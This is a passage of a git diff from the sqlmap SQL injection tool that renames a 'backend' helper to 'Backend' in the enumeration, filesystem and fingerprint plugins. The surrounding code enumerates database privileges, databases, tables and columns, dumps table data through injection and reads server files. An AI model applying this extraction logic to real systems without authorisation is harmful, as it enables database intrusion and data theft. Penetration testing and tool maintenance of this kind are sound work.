- dbaCondition |= ( backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema and "SUPER" in privileges )
+ dbaCondition |= ( Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema and "SUPER" in privileges )
# In MySQL < 5.0 the super_priv privilege means
# that the user is DBA
- dbaCondition |= ( backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema and "super_priv" in privileges )
+ dbaCondition |= ( Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema and "super_priv" in privileges )
# In Firebird there is no specific privilege that means
# that the user is DBA
# TODO: confirm
- dbaCondition |= ( backend.getIdentifiedDbms() == DBMS.FIREBIRD and "SELECT" in privileges and "INSERT" in privileges and "UPDATE" in privileges and "DELETE" in privileges and "REFERENCES" in privileges and "EXECUTE" in privileges )
+ dbaCondition |= ( Backend.getIdentifiedDbms() == DBMS.FIREBIRD and "SELECT" in privileges and "INSERT" in privileges and "UPDATE" in privileges and "DELETE" in privileges and "REFERENCES" in privileges and "EXECUTE" in privileges )
return dbaCondition
def getPrivileges(self, query2=False):
infoMsg = "fetching database users privileges"
- rootQuery = queries[backend.getIdentifiedDbms()].privileges
+ rootQuery = queries[Backend.getIdentifiedDbms()].privileges
if conf.user == "CU":
infoMsg += " for current user"
@@ -432,10 +432,10 @@ class Enumeration:
}
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.inband.query2
condition = rootQuery.inband.condition2
- elif backend.getIdentifiedDbms() == DBMS.ORACLE and query2:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE and query2:
query = rootQuery.inband.query2
condition = rootQuery.inband.condition2
else:
@@ -447,7 +447,7 @@ class Enumeration:
query += " WHERE "
# NOTE: I assume that the user provided is not in
# MySQL >= 5.0 syntax 'user'@'host'
- if backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
queryUser = "%" + conf.user + "%"
query += " OR ".join("%s LIKE '%s'" % (condition, "%" + user + "%") for user in users)
else:
@@ -455,7 +455,7 @@ class Enumeration:
values = inject.getValue(query, blind=False)
- if not values and backend.getIdentifiedDbms() == DBMS.ORACLE and not query2:
+ if not values and Backend.getIdentifiedDbms() == DBMS.ORACLE and not query2:
infoMsg = "trying with table USER_SYS_PRIVS"
logger.info(infoMsg)
@@ -477,19 +477,19 @@ class Enumeration:
# In PostgreSQL we get 1 if the privilege is
# True, 0 otherwise
- if backend.getIdentifiedDbms() == DBMS.PGSQL and getUnicode(privilege).isdigit():
+ if Backend.getIdentifiedDbms() == DBMS.PGSQL and getUnicode(privilege).isdigit():
for position, pgsqlPriv in pgsqlPrivs:
if count == position and int(privilege) == 1:
privileges.add(pgsqlPriv)
# In MySQL >= 5.0 and Oracle we get the list
# of privileges as string
- elif backend.getIdentifiedDbms() == DBMS.ORACLE or ( backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema ):
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE or ( Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema ):
privileges.add(privilege)
# In MySQL < 5.0 we get Y if the privilege is
# True, N otherwise
- elif backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
for position, mysqlPriv in mysqlPrivs:
if count == position and privilege.upper() == "Y":
privileges.add(mysqlPriv)
@@ -506,7 +506,7 @@ class Enumeration:
conditionChar = "="
if conf.user:
- if backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
conditionChar = " LIKE "
if "," in conf.user:
@@ -533,7 +533,7 @@ class Enumeration:
for user in users:
unescapedUser = None
- if backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
unescapedUser = unescaper.unescape(user, quote=False)
if user in retrievedUsers:
@@ -548,18 +548,18 @@ class Enumeration:
else:
queryUser = user
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.blind.count2 % queryUser
- elif backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
query = rootQuery.blind.count % (conditionChar, queryUser)
- elif backend.getIdentifiedDbms() == DBMS.ORACLE and query2:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE and query2:
query = rootQuery.blind.count2 % queryUser
else:
query = rootQuery.blind.count % queryUser
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
if not isNumPosStrValue(count):
- if not (isinstance(count, basestring) and count.isdigit()) and backend.getIdentifiedDbms() == DBMS.ORACLE and not query2:
+ if not (isinstance(count, basestring) and count.isdigit()) and Backend.getIdentifiedDbms() == DBMS.ORACLE and not query2:
infoMsg = "trying with table USER_SYS_PRIVS"
logger.info(infoMsg)
@@ -575,20 +575,20 @@ class Enumeration:
privileges = set()
- if backend.getIdentifiedDbms() == DBMS.ORACLE:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE:
plusOne = True
else:
plusOne = False
indexRange = getRange(count, plusOne=plusOne)
for index in indexRange:
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.blind.query2 % (queryUser, index)
- elif backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
query = rootQuery.blind.query % (conditionChar, queryUser, index)
- elif backend.getIdentifiedDbms() == DBMS.ORACLE and query2:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE and query2:
query = rootQuery.blind.query2 % (queryUser, index)
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
query = rootQuery.blind.query % (index, queryUser)
else:
query = rootQuery.blind.query % (queryUser, index)
@@ -596,7 +596,7 @@ class Enumeration:
# In PostgreSQL we get 1 if the privilege is True,
# 0 otherwise
- if backend.getIdentifiedDbms() == DBMS.PGSQL and ", " in privilege:
+ if Backend.getIdentifiedDbms() == DBMS.PGSQL and ", " in privilege:
privilege = privilege.replace(", ", ",")
privs = privilege.split(",")
i = 1
@@ -611,12 +611,12 @@ class Enumeration:
# In MySQL >= 5.0 and Oracle we get the list
# of privileges as string
- elif backend.getIdentifiedDbms() == DBMS.ORACLE or ( backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema ):
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE or ( Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema ):
privileges.add(privilege)
# In MySQL < 5.0 we get Y if the privilege is
# True, N otherwise
- elif backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
privilege = privilege.replace(", ", ",")
privs = privilege.split(",")
i = 1
@@ -630,7 +630,7 @@ class Enumeration:
i += 1
# In Firebird we get one letter for each privilege
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
privileges.add(firebirdPrivs[privilege.strip()])
if self.__isAdminFromPrivileges(privileges):
@@ -639,7 +639,7 @@ class Enumeration:
# In MySQL < 5.0 we break the cycle after the first
# time we get the user's privileges otherwise we
# duplicate the same query
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
break
if privileges:
@@ -659,14 +659,14 @@ class Enumeration:
return ( kb.data.cachedUsersPrivileges, areAdmins )
def getRoles(self, query2=False):
- warnMsg = "on %s the concept of roles does not " % backend.getIdentifiedDbms()
+ warnMsg = "on %s the concept of roles does not " % Backend.getIdentifiedDbms()
warnMsg += "exist. sqlmap will enumerate privileges instead"
logger.warn(warnMsg)
return self.getPrivileges(query2)
def getDbs(self):
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
warnMsg = "information_schema not available, "
warnMsg += "back-end DBMS is MySQL < 5. database "
warnMsg += "names will be fetched from 'mysql' database"
@@ -675,10 +675,10 @@ class Enumeration:
infoMsg = "fetching database names"
logger.info(infoMsg)
- rootQuery = queries[backend.getIdentifiedDbms()].dbs
+ rootQuery = queries[Backend.getIdentifiedDbms()].dbs
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.inband.query2
else:
query = rootQuery.inband.query
@@ -691,7 +691,7 @@ class Enumeration:
infoMsg = "fetching number of databases"
logger.info(infoMsg)
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.blind.count2
else:
query = rootQuery.blind.count
@@ -704,9 +704,9 @@ class Enumeration:
indexRange = getRange(count)
for index in indexRange:
- if backend.getIdentifiedDbms() == DBMS.SYBASE:
+ if Backend.getIdentifiedDbms() == DBMS.SYBASE:
query = rootQuery.blind.query % (kb.data.cachedDbs[-1] if kb.data.cachedDbs else " ")
- elif backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.blind.query2 % index
else:
query = rootQuery.blind.query % index
@@ -726,13 +726,13 @@ class Enumeration:
self.forceDbmsEnum()
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
errMsg = "information_schema not available, "
errMsg += "back-end DBMS is MySQL < 5.0"
logger.error(errMsg)
bruteForce = True
- elif backend.getIdentifiedDbms() == DBMS.ACCESS:
+ elif Backend.getIdentifiedDbms() == DBMS.ACCESS:
errMsg = "cannot retrieve table names, "
errMsg += "back-end DBMS is Access"
logger.error(errMsg)
@@ -771,7 +771,7 @@ class Enumeration:
infoMsg += " for database '%s'" % conf.db
logger.info(infoMsg)
- rootQuery = queries[backend.getIdentifiedDbms()].tables
+ rootQuery = queries[Backend.getIdentifiedDbms()].tables
if conf.db:
if "," in conf.db:
@@ -789,7 +789,7 @@ class Enumeration:
condition = rootQuery.inband.condition if 'condition' in rootQuery.inband else None
if condition:
- if conf.db and backend.getIdentifiedDbms() != DBMS.SQLITE:
+ if conf.db and Backend.getIdentifiedDbms() != DBMS.SQLITE:
if "," in conf.db:
dbs = conf.db.split(",")
query += " WHERE "
@@ -802,12 +802,12 @@ class Enumeration:
infoMsg = "skipping system databases '%s'" % ", ".join(db for db in self.excludeDbsList)
logger.info(infoMsg)
- if backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
query = safeStringFormat(query, conf.db)
value = inject.getValue(query, blind=False)
if value:
- if backend.getIdentifiedDbms() == DBMS.SQLITE:
+ if Backend.getIdentifiedDbms() == DBMS.SQLITE:
if isinstance(value, basestring):
value = [[ DBMS.SQLITE, value ]]
elif isinstance(value, (list, tuple, set)):
@@ -836,7 +836,7 @@ class Enumeration:
infoMsg += "database '%s'" % db
logger.info(infoMsg)
- if backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB):
+ if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB):
query = rootQuery.blind.count
else:
query = rootQuery.blind.count % db
@@ -850,18 +850,18 @@ class Enumeration:
tables = []
- if backend.getIdentifiedDbms() in ( DBMS.MSSQL, DBMS.ORACLE ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MSSQL, DBMS.ORACLE ):
plusOne = True
else:
plusOne = False
indexRange = getRange(count, plusOne=plusOne)
for index in indexRange:
- if backend.getIdentifiedDbms() == DBMS.SYBASE:
+ if Backend.getIdentifiedDbms() == DBMS.SYBASE:
query = rootQuery.blind.query % (db, (kb.data.cachedTables[-1] if kb.data.cachedTables else " "))
- elif backend.getIdentifiedDbms() == DBMS.MAXDB:
+ elif Backend.getIdentifiedDbms() == DBMS.MAXDB:
query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ")
- elif backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
+ elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
query = rootQuery.blind.query % index
else:
query = rootQuery.blind.query % (db, index)
@@ -902,13 +902,13 @@ class Enumeration:
conf.db = self.getCurrentDb()
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
errMsg = "information_schema not available, "
errMsg += "back-end DBMS is MySQL < 5.0"
logger.error(errMsg)
bruteForce = True
- elif backend.getIdentifiedDbms() == DBMS.ACCESS:
+ elif Backend.getIdentifiedDbms() == DBMS.ACCESS:
errMsg = "cannot retrieve column names, "
errMsg += "back-end DBMS is Access"
logger.error(errMsg)
@@ -959,13 +959,13 @@ class Enumeration:
"37":"VARCHAR"
}
- rootQuery = queries[backend.getIdentifiedDbms()].columns
+ rootQuery = queries[Backend.getIdentifiedDbms()].columns
condition = rootQuery.blind.condition if 'condition' in rootQuery.blind else None
infoMsg = "fetching columns "
if conf.col:
- if backend.getIdentifiedDbms() == DBMS.ORACLE:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE:
conf.col = conf.col.upper()
colList = conf.col.split(",")
condQuery = " AND (" + " OR ".join("%s LIKE '%s'" % (condition, "%" + col + "%") for col in colList) + ")"
@@ -978,24 +978,24 @@ class Enumeration:
logger.info(infoMsg)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
query = rootQuery.inband.query % (conf.tbl, conf.db)
query += condQuery
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
query = rootQuery.inband.query % conf.tbl.upper()
query += condQuery
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
query = rootQuery.inband.query % (conf.db, conf.db,
conf.db, conf.db,
conf.db, conf.db,
conf.db, conf.tbl)
query += condQuery.replace("[DB]", conf.db)
- elif backend.getIdentifiedDbms() == DBMS.SQLITE:
+ elif Backend.getIdentifiedDbms() == DBMS.SQLITE:
query = rootQuery.inband.query % conf.tbl
value = inject.getValue(query, blind=False)
- if backend.getIdentifiedDbms() == DBMS.SQLITE:
+ if Backend.getIdentifiedDbms() == DBMS.SQLITE:
parseSqliteTableSchema(value)
elif value:
table = {}
@@ -1018,19 +1018,19 @@ class Enumeration:
infoMsg += " on database '%s'" % conf.db
logger.info(infoMsg)
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
query = rootQuery.blind.count % (conf.tbl, conf.db)
query += condQuery
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
query = rootQuery.blind.count % conf.tbl.upper()
query += condQuery
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
query = rootQuery.blind.count % (conf.db, conf.db, conf.tbl)
query += condQuery.replace("[DB]", conf.db)
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
query = rootQuery.blind.count % (conf.tbl)
query += condQuery
- elif backend.getIdentifiedDbms() == DBMS.SQLITE:
+ elif Backend.getIdentifiedDbms() == DBMS.SQLITE:
query = rootQuery.blind.query % conf.tbl
value = inject.getValue(query, inband=False, error=False)
@@ -1052,22 +1052,22 @@ class Enumeration:
indexRange = getRange(count)
for index in indexRange:
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
query = rootQuery.blind.query % (conf.tbl, conf.db)
query += condQuery
field = None
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
query = rootQuery.blind.query % (conf.tbl.upper())
query += condQuery
field = None
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
query = rootQuery.blind.query % (conf.db, conf.db,
conf.db, conf.db,
conf.db, conf.db,
conf.tbl)
query += condQuery.replace("[DB]", conf.db)
field = condition.replace("[DB]", conf.db)
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
query = rootQuery.blind.query % (conf.tbl)
query += condQuery
field = None
@@ -1076,20 +1076,20 @@ class Enumeration:
column = inject.getValue(query, inband=False, error=False)
if not onlyColNames:
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
query = rootQuery.blind.query2 % (conf.tbl, column, conf.db)
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
query = rootQuery.blind.query2 % (conf.tbl.upper(), column)
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db,
conf.db, column, conf.db,
conf.db, conf.db, conf.tbl)
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
query = rootQuery.blind.query2 % (conf.tbl, column)
colType = inject.getValue(query, inband=False, error=False)
- if backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ if Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
colType = firebirdTypes[colType] if colType in firebirdTypes else colType
columns[column] = colType
@@ -1135,9 +1135,9 @@ class Enumeration:
conf.db = self.getCurrentDb()
- rootQuery = queries[backend.getIdentifiedDbms()].dump_table
+ rootQuery = queries[Backend.getIdentifiedDbms()].dump_table
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
if '-' in conf.tbl:
conf.tbl = "`%s`" % conf.tbl
if '-' in conf.db:
@@ -1180,9 +1180,9 @@ class Enumeration:
entriesCount = 0
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
- if backend.getIdentifiedDbms() == DBMS.ORACLE:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE:
query = rootQuery.inband.query % (colString, conf.tbl.upper())
- elif backend.getIdentifiedDbms() == DBMS.SQLITE:
+ elif Backend.getIdentifiedDbms() == DBMS.SQLITE:
query = rootQuery.inband.query % (colString, conf.tbl)
else:
query = rootQuery.inband.query % (colString, conf.db, conf.tbl)
@@ -1228,9 +1228,9 @@ class Enumeration:
infoMsg += "on database '%s'" % conf.db
logger.info(infoMsg)
- if backend.getIdentifiedDbms() == DBMS.ORACLE:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE:
query = rootQuery.blind.count % conf.tbl.upper()
- elif backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
+ elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
query = rootQuery.blind.count % conf.tbl
else:
query = rootQuery.blind.count % (conf.db, conf.tbl)
@@ -1250,14 +1250,14 @@ class Enumeration:
lengths = {}
entries = {}
- if backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MSSQL, DBMS.SYBASE):
+ if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MSSQL, DBMS.SYBASE):
plusOne = True
else:
plusOne = False
indexRange = getRange(count, dump=True, plusOne=plusOne)
try:
- if backend.getIdentifiedDbms() == DBMS.ACCESS:
+ if Backend.getIdentifiedDbms() == DBMS.ACCESS:
validColumnList = False
validPivotValue = False
@@ -1334,22 +1334,22 @@ class Enumeration:
if column not in entries:
entries[column] = []
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
query = rootQuery.blind.query % (column, conf.db,
conf.tbl, index)
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
query = rootQuery.blind.query % (column, column,
conf.tbl.upper(),
index)
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
query = rootQuery.blind.query % (column, index, conf.db,
conf.tbl, colList[0],
colList[0], colList[0])
- elif backend.getIdentifiedDbms() == DBMS.SQLITE:
+ elif Backend.getIdentifiedDbms() == DBMS.SQLITE:
query = rootQuery.blind.query % (column, conf.tbl, index)
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
query = rootQuery.blind.query % (index, column, conf.tbl)
value = inject.getValue(query, inband=False, error=False)
@@ -1393,7 +1393,7 @@ class Enumeration:
return kb.data.dumpedTable
def dumpAll(self):
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
errMsg = "information_schema not available, "
errMsg += "back-end DBMS is MySQL < 5.0"
raise sqlmapUnsupportedFeatureException, errMsg
@@ -1494,10 +1494,10 @@ class Enumeration:
def searchDb(self):
foundDbs = []
- rootQuery = queries[backend.getIdentifiedDbms()].search_db
+ rootQuery = queries[Backend.getIdentifiedDbms()].search_db
dbList = conf.db.split(",")
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
dbCond = rootQuery.inband.condition2
else:
dbCond = rootQuery.inband.condition
@@ -1522,7 +1522,7 @@ class Enumeration:
dbQuery = dbQuery % db
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.inband.query2
else:
query = rootQuery.inband.query
@@ -1543,7 +1543,7 @@ class Enumeration:
infoMsg += " '%s'" % db
logger.info(infoMsg)
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.blind.count2
else:
query = rootQuery.blind.count
@@ -1563,7 +1563,7 @@ class Enumeration:
indexRange = getRange(count)
for index in indexRange:
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.blind.query2
else:
query = rootQuery.blind.query
@@ -1578,12 +1578,12 @@ class Enumeration:
def searchTable(self):
bruteForce = False
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
errMsg = "information_schema not available, "
errMsg += "back-end DBMS is MySQL < 5.0"
bruteForce = True
- elif backend.getIdentifiedDbms() == DBMS.ACCESS:
+ elif Backend.getIdentifiedDbms() == DBMS.ACCESS:
errMsg = "cannot retrieve table names, "
errMsg += "back-end DBMS is Access"
logger.error(errMsg)
@@ -1601,7 +1601,7 @@ class Enumeration:
regex = "|".join(conf.tbl.split(","))
return tableExists(paths.COMMON_TABLES, regex)
- rootQuery = queries[backend.getIdentifiedDbms()].search_table
+ rootQuery = queries[Backend.getIdentifiedDbms()].search_table
foundTbls = {}
tblList = conf.tbl.split(",")
tblCond = rootQuery.inband.condition
@@ -1610,7 +1610,7 @@ class Enumeration:
tblConsider, tblCondParam = self.likeOrExact("table")
for tbl in tblList:
- if backend.getIdentifiedDbms() == DBMS.ORACLE:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE:
tbl = tbl.upper()
infoMsg = "searching table"
@@ -1720,12 +1720,12 @@ class Enumeration:
def searchColumn(self):
bruteForce = False
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
errMsg = "information_schema not available, "
errMsg += "back-end DBMS is MySQL < 5.0"
bruteForce = True
- elif backend.getIdentifiedDbms() == DBMS.ACCESS:
+ elif Backend.getIdentifiedDbms() == DBMS.ACCESS:
errMsg = "cannot retrieve column names, "
errMsg += "back-end DBMS is Access"
logger.error(errMsg)
@@ -1751,7 +1751,7 @@ class Enumeration:
return
- rootQuery = queries[backend.getIdentifiedDbms()].search_column
+ rootQuery = queries[Backend.getIdentifiedDbms()].search_column
foundCols = {}
dbs = {}
colList = conf.col.split(",")
@@ -1968,7 +1968,7 @@ class Enumeration:
return output
def sqlShell(self):
- infoMsg = "calling %s shell. To quit type " % backend.getIdentifiedDbms()
+ infoMsg = "calling %s shell. To quit type " % Backend.getIdentifiedDbms()
infoMsg += "'x' or 'q' and press ENTER"
logger.info(infoMsg)
diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py
index a9879630a..189443e5e 100644
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
@@ -13,7 +13,7 @@ import os
from lib.core.agent import agent
from lib.core.common import dataToOutFile
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import isTechniqueAvailable
from lib.core.common import randomStr
from lib.core.common import readInput
@@ -87,13 +87,13 @@ class Filesystem:
return fileLines
def __checkWrittenFile(self, wFile, dFile, fileType):
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
lengthQuery = "SELECT LENGTH(LOAD_FILE('%s'))" % dFile
- elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
lengthQuery = "SELECT LENGTH(data) FROM pg_largeobject WHERE loid=%d" % self.oid
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
self.createSupportTbl(self.fileTblName, self.tblField, "text")
# Reference: http://msdn.microsoft.com/en-us/library/ms188365.aspx
@@ -271,7 +271,7 @@ class Filesystem:
fileContent = self.unionReadFile(rFile)
- if fileContent in ( None, "" ) and backend.getIdentifiedDbms() != DBMS.PGSQL:
+ if fileContent in ( None, "" ) and Backend.getIdentifiedDbms() != DBMS.PGSQL:
self.cleanup(onlyFileTbl=True)
return
@@ -289,7 +289,7 @@ class Filesystem:
fileContent = self.__unhexString(fileContent)
rFilePath = dataToOutFile(fileContent)
- if backend.getIdentifiedDbms() != DBMS.PGSQL:
+ if Backend.getIdentifiedDbms() != DBMS.PGSQL:
self.cleanup(onlyFileTbl=True)
return rFilePath
diff --git a/plugins/generic/fingerprint.py b/plugins/generic/fingerprint.py
index fa5aa4802..7ed3e1159 100644
--- a/plugins/generic/fingerprint.py
+++ b/plugins/generic/fingerprint.py
@@ -7,7 +7,7 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import readInput
from lib.core.data import kb
from lib.core.data import logger
@@ -19,7 +19,7 @@ class Fingerprint:
"""
def __init__(self, dbms):
- backend.forceDbms(dbms)
+ Backend.forceDbms(dbms)
def getFingerprint(self):
errMsg = "'getFingerprint' method must be defined "
diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py
index 3b828a47f..695c6053c 100644
